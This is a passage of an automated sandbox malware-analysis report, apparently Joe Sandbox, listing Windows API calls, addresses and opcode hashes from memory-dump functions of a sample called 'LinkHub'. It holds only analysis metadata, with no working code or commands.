                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 002D76FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MessageSendShow
                                                                    • String ID:
                                                                    • API String ID: 3688381893-0
                                                                    • Opcode ID: b218671c3498997824e1e2e4332ee4ab033a2689fdee8b271453329a39e2c76c
                                                                    • Instruction ID: c0f44fc7c296268a7c06ed90a617c6c6eae153ef8c5994a9379fbc002a99d38f
                                                                    • Opcode Fuzzy Hash: b218671c3498997824e1e2e4332ee4ab033a2689fdee8b271453329a39e2c76c
                                                                    • Instruction Fuzzy Hash: 0041E635A28505AFD725CF2CCC48FA9BB69EB09350F150266F819A73E0F774ED20DA90
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: c2fea1652312145f7dc104cfa71871d1bd9db32bb29b4cdc7a7338dfddad2b8c
                                                                    • Instruction ID: e60396b3a50b3b1a1b03ab86927c2f805897b5f13897c03a12e3bb24903d023e
                                                                    • Opcode Fuzzy Hash: c2fea1652312145f7dc104cfa71871d1bd9db32bb29b4cdc7a7338dfddad2b8c
                                                                    • Instruction Fuzzy Hash: 8441D136A10200DFCB20DF78C891A5EB3F5EF89314F1585A9E519EB391D731AD15DB80
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 002A2262
                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 002A230E
                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 002A2316
                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 002A2327
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 002A232F
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: 51bbbc325b2f236292d02cbbda5be4ecfc7f6e51c4a784e630f123b265cec66b
                                                                    • Instruction ID: dc39f9b7f2e04c7170324f4b899d020ab355994956f1cbf2fe84f3445dd21ec5
                                                                    • Opcode Fuzzy Hash: 51bbbc325b2f236292d02cbbda5be4ecfc7f6e51c4a784e630f123b265cec66b
                                                                    • Instruction Fuzzy Hash: 7431BC7191021AEFDB04CFACDD88A9E3BB5EB05315F00422AF925A72D0CB70AD58CB90
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,002BCC63,00000000), ref: 002BD97D
                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 002BD9B4
                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,002BCC63,00000000), ref: 002BD9F9
                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,002BCC63,00000000), ref: 002BDA0D
                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,002BCC63,00000000), ref: 002BDA37
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                    • String ID:
                                                                    • API String ID: 3191363074-0
                                                                    • Opcode ID: 1d77d5914ee271cc1ebd75a672db894c21b83b029e3d28ac43d5ab6607a01bcf
                                                                    • Instruction ID: 6c603bf9b9a52595654f9306150ba1074296b4579aad0ee83282fe5074e86304
                                                                    • Opcode Fuzzy Hash: 1d77d5914ee271cc1ebd75a672db894c21b83b029e3d28ac43d5ab6607a01bcf
                                                                    • Instruction Fuzzy Hash: 37316F71924A05EFDB24DFA5D888AEFBBF8EF04390B10446EE546D2150E770EE50DB60
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002D61E4
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 002D623C
                                                                    • _wcslen.LIBCMT ref: 002D624E
                                                                    • _wcslen.LIBCMT ref: 002D6259
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D62B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 763830540-0
                                                                    • Opcode ID: 17b86aa458fa155bbcbedc33d2280beed09078811dc8aade008846135fcd5fa6
                                                                    • Instruction ID: ce519f525f42a4fe42e7a97416a741f085b97b5dd53f6c3231ec88bea88beac6
                                                                    • Opcode Fuzzy Hash: 17b86aa458fa155bbcbedc33d2280beed09078811dc8aade008846135fcd5fa6
                                                                    • Instruction Fuzzy Hash: 9321A231D202199AEB11DFA4CC88AEEB7B8EF05720F104257F925EA2C0D7B09DA5CF50
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 002C13AE
                                                                    • GetForegroundWindow.USER32 ref: 002C13C5
                                                                    • GetDC.USER32(00000000), ref: 002C1401
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 002C140D
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 002C1445
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    • Opcode ID: 0d76c9ee09399cd145f6e6c513b73ae3267c9612695f66381c70c49fb8817f70
                                                                    • Instruction ID: 2d9712a3d7b9f403e093c0dde9a6525964986134e842f1ce8625714c31b40b00
                                                                    • Opcode Fuzzy Hash: 0d76c9ee09399cd145f6e6c513b73ae3267c9612695f66381c70c49fb8817f70
                                                                    • Instruction Fuzzy Hash: DB21A135A11604EFD704EF64D899EAEBBF9EF48340B048469E84A97761CA30EC54CFA0
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0027D146
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0027D169
                                                                      • Part of subcall function 00273B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00260165,?,?,002B11D9,0000FFFF), ref: 00273BC5
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0027D18F
                                                                    • _free.LIBCMT ref: 0027D1A2
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0027D1B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: 5d4bd5c3edab4c100035c7110a74f6892ccdabba5944f493ea577b23390e4540
                                                                    • Instruction ID: 73ee279afce7c863fcfb51da0a1d27db16b6d715a49afef01ba596c67f8005f7
                                                                    • Opcode Fuzzy Hash: 5d4bd5c3edab4c100035c7110a74f6892ccdabba5944f493ea577b23390e4540
                                                                    • Instruction Fuzzy Hash: 8601F772A266167F33216A7A6C8CC7B7B7DDEC2B61354812AFC0CC3240DA708C1185B0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(75912E40,?,?,0026F64E,00273BD6,?,?,00260165,?,?,002B11D9,0000FFFF), ref: 00273170
                                                                    • _free.LIBCMT ref: 002731A5
                                                                    • _free.LIBCMT ref: 002731CC
                                                                    • SetLastError.KERNEL32(00000000), ref: 002731D9
                                                                    • SetLastError.KERNEL32(00000000), ref: 002731E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: a2c60c528aa10452086daa73983440d916ebe4e3b19f9de602deeb02d1b80fd8
                                                                    • Instruction ID: 59d871ad875830789040a5804082cdc9663dd56d13a442f5f6b91dbfd4d71233
                                                                    • Opcode Fuzzy Hash: a2c60c528aa10452086daa73983440d916ebe4e3b19f9de602deeb02d1b80fd8
                                                                    • Instruction Fuzzy Hash: 4D017D726B1A01BBC212EB38AC89E6B179C9FC53717608029F81CD2181EF71CE216921
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002A0831,80070057,?,?,?,002A0C4E), ref: 002A091B
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002A0831,80070057,?,?), ref: 002A0936
                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002A0831,80070057,?,?), ref: 002A0944
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002A0831,80070057,?), ref: 002A0954
                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002A0831,80070057,?,?), ref: 002A0960
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    • Opcode ID: 66a9dd4dcaa0ab01bedf55b5c83645c0b009a065cfda7d065d6d05821cf6c07b
                                                                    • Instruction ID: 60c87e4f494d4fdceeb14fe62006eca1f93b0d3fb6e29b67877796d82d2f0aa0
                                                                    • Opcode Fuzzy Hash: 66a9dd4dcaa0ab01bedf55b5c83645c0b009a065cfda7d065d6d05821cf6c07b
                                                                    • Instruction Fuzzy Hash: 6801F272A11206BFEB014F54EC88B9F7BBDEF44B51F100025F905E2211DB70ED109BA0
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 002AF2AE
                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 002AF2BC
                                                                    • Sleep.KERNEL32(00000000), ref: 002AF2C4
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 002AF2CE
                                                                    • Sleep.KERNEL32 ref: 002AF30A
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    • Opcode ID: 3cc9b184b2829f45412c9c4ae31ab0c3a66d414e8264a9358de6042d15ba061b
                                                                    • Instruction ID: 18da45d1d36367f08dcc7c411bd9a3b8ebd0680611fef49253fb4b7d67b86c08
                                                                    • Opcode Fuzzy Hash: 3cc9b184b2829f45412c9c4ae31ab0c3a66d414e8264a9358de6042d15ba061b
                                                                    • Instruction Fuzzy Hash: 16016D71C12619EBDF00AFE4ED4DAEDBB78FB0A700F010466D902B2250DF349964C7A1
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A1A60
                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,002A14E7,?,?,?), ref: 002A1A6C
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002A14E7,?,?,?), ref: 002A1A7B
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002A14E7,?,?,?), ref: 002A1A82
                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A1A99
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 842720411-0
                                                                    • Opcode ID: f94fef72bd7d304666dc9cd3366cfcfa468dc62aba4107000940eb0624182f97
                                                                    • Instruction ID: 17b288852a90b041ea8d8eff29db0c8a149f52b27cd72c44135b42485acf7136
                                                                    • Opcode Fuzzy Hash: f94fef72bd7d304666dc9cd3366cfcfa468dc62aba4107000940eb0624182f97
                                                                    • Instruction Fuzzy Hash: E50181B5A42606BFDB114F64EC4CD6A3B6DEF85364F210455F845C32A0DA31DC50CA60
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A1916
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A1922
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A1931
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A1938
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A194E
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 6e3c04b14a7f7fb63440fc18a358a5e81518aac056a1d419f4da0954674d87dd
                                                                    • Instruction ID: 92db86e60a38af3991e2de76dd68f5fcdf5b6a8ccb157ed6d51bba5671285788
                                                                    • Opcode Fuzzy Hash: 6e3c04b14a7f7fb63440fc18a358a5e81518aac056a1d419f4da0954674d87dd
                                                                    • Instruction Fuzzy Hash: 35F04979641712BBDB210FA5AC4DF573BADEF8A7A1F100416FA49D72A0CA70DC20CA60
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A1976
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A1982
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A1991
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A1998
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A19AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 9f4a9aa3f217b5552b8bb23326452fca604f18776e35dc419c681bce54d08c78
                                                                    • Instruction ID: 4e297bedeab392874e4d4c3e952117f324183ebe04d34a57cd26295a1def361f
                                                                    • Opcode Fuzzy Hash: 9f4a9aa3f217b5552b8bb23326452fca604f18776e35dc419c681bce54d08c78
                                                                    • Instruction Fuzzy Hash: F1F04F75541712BBD7215F64EC5DF573B6DEF897A1F100415FA45C7250CA70DC10CA60
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(?,?,?,?,002B0B24,?,002B3D41,?,00000001,00283AF4,?), ref: 002B0CCB
                                                                    • CloseHandle.KERNEL32(?,?,?,?,002B0B24,?,002B3D41,?,00000001,00283AF4,?), ref: 002B0CD8
                                                                    • CloseHandle.KERNEL32(?,?,?,?,002B0B24,?,002B3D41,?,00000001,00283AF4,?), ref: 002B0CE5
                                                                    • CloseHandle.KERNEL32(?,?,?,?,002B0B24,?,002B3D41,?,00000001,00283AF4,?), ref: 002B0CF2
                                                                    • CloseHandle.KERNEL32(?,?,?,?,002B0B24,?,002B3D41,?,00000001,00283AF4,?), ref: 002B0CFF
                                                                    • CloseHandle.KERNEL32(?,?,?,?,002B0B24,?,002B3D41,?,00000001,00283AF4,?), ref: 002B0D0C
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: 280d079d28abf142eed255c8c52d76144875066a83efda6409f51ff0c5a57daf
                                                                    • Instruction ID: dac963fd8b8ee111d733ffb53d9e678799d34e9955fedb9e447f0fdd7e05367d
                                                                    • Opcode Fuzzy Hash: 280d079d28abf142eed255c8c52d76144875066a83efda6409f51ff0c5a57daf
                                                                    • Instruction Fuzzy Hash: 2901DC71800B06CFCB31AFA6D8C0857FBF9BE503553108A3FD09652931C7B0A8A8CE80
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 002A65BF
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 002A65D6
                                                                    • MessageBeep.USER32(00000000), ref: 002A65EE
                                                                    • KillTimer.USER32(?,0000040A), ref: 002A660A
                                                                    • EndDialog.USER32(?,00000001), ref: 002A6624
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: 2b2b16f05cb4523bbdfd55d50ea552ded4b39b12b6dbbd1015d706223bd81e00
                                                                    • Instruction ID: 6981ce8f18d14e50f8d172b73e5bf124123677e2e5c6bf50c5ba212041cf1c28
                                                                    • Opcode Fuzzy Hash: 2b2b16f05cb4523bbdfd55d50ea552ded4b39b12b6dbbd1015d706223bd81e00
                                                                    • Instruction Fuzzy Hash: 77018630D51704ABEB305F20ED4EB967B7CFF01B05F04055AA186610E1DFF4AE548AD0
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0027DAD2
                                                                      • Part of subcall function 00272D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0027DB51,?,00000000,?,00000000,?,0027DB78,?,00000007,?,?,0027DF75,?), ref: 00272D4E
                                                                      • Part of subcall function 00272D38: GetLastError.KERNEL32(?,?,0027DB51,?,00000000,?,00000000,?,0027DB78,?,00000007,?,?,0027DF75,?,?), ref: 00272D60
                                                                    • _free.LIBCMT ref: 0027DAE4
                                                                    • _free.LIBCMT ref: 0027DAF6
                                                                    • _free.LIBCMT ref: 0027DB08
                                                                    • _free.LIBCMT ref: 0027DB1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
